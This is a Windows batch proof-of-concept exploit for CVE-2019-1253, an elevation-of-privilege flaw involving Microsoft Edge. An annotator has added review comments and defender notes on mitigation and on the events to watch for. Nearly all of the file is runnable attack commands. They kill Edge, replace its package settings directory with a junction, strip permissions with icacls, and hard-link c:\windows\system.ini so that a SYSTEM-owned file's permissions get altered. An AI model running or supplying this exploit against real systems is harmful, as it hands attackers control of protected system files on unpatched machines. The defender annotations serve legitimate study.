appexploit.bat
:: padovah4ck's CVE-2019-1253 EoP version by modifying ACL of arbitrary file where SYSTEM has full control!
:: simple "batch" version, all you need is a utility to create native hardlinks (ex: https://github.com/googleprojectzero/symboliclink-testing-tools/tree/master/CreateHardlink)
:: by @decoder_it - https://github.com/decoder-it
::
:: What this file is: a proof of concept for CVE-2019-1253. It swaps the current
:: user's Microsoft Edge package "settings" directory for a directory junction
:: and plants a hard link behind it. Nothing below edits the ACL of %filetoown%
:: directly; per the header, the ACL change is expected to happen as a side
:: effect of Edge starting.
:: NOTE(review): which component applies the ACL is not visible in this file -
:: confirm against the vendor advisory.
::
:: Defender notes:
::   - Mitigation: install the vendor security update for CVE-2019-1253.
::   - Observable sequence (all visible in the commands below): forced
::     termination of MicrosoftEdge* processes, removal of the package
::     "settings" directory, creation of a junction in its place that points
::     at a user-chosen folder, icacls /remove:g on that folder, a hard link
::     from that folder to a file under c:\windows, and a second Edge launch.
::     An unexpected DACL change on the linked file afterwards is the impact
::     to look for.
@echo off
:: Working directory that becomes the junction target.
set foo=c:\foodir
:: File the hard link will point at (the "arbitrary file" named in the header).
set filetoown=c:\windows\system.ini
:: Refuse to run when the working directory already exists; exit /b stops the script.
if exist %foo% (
echo directory %foo% exists, delete it before!
exit /b
)
mkdir %foo%
:: Force-stop any running Edge processes before touching the settings directory
:: (presumably so the directory is not in use - verify).
taskkill /f /im MicrosoftEdge*
:: Delete the real settings directory (quiet, recursive) and put a junction to %foo% in its place.
rd /q /s C:\Users\%username%\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings
mklink /j C:\Users\%username%\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings %foo%
:: First Edge launch through the microsoft-edge: URI handler, a wait, then a forced stop.
:: Presumably this lets Edge recreate its settings content through the junction into %foo%;
:: the del commands that follow are consistent with that - confirm.
start microsoft-edge:
timeout /t:10
taskkill /f /im MicrosoftEdge*
:: Empty %foo%: hidden files first (/ah), then everything else.
cd /d %foo%
del /q /ah *.*
del /q *.*
:: Remove granted ACEs on %foo% for the listed SID and for the current user.
:: NOTE(review): the S-1-15-2-... prefix denotes an app package (AppContainer) SID,
:: presumably Edge's - verify.
icacls %foo% /remove:g *S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194
icacls %foo% /remove:g %username%
:: Disabled pause, left in by the author.
:: pause
:: Remove the junction, create the hard link, then recreate the junction.
rd /q /s C:\Users\%username%\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings
:: External helper binary expected at a fixed path; it is not part of this file.
:: It is called with %foo%\foot.txt as the new link name and %filetoown% as the existing file.
c:\temp\createhardlink.exe %foo%\foot.txt %filetoown%
mklink /j C:\Users\%username%\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\settings %foo%
:: Second Edge launch; per the header this is the step after which the linked file's ACL is changed.
start microsoft-edge: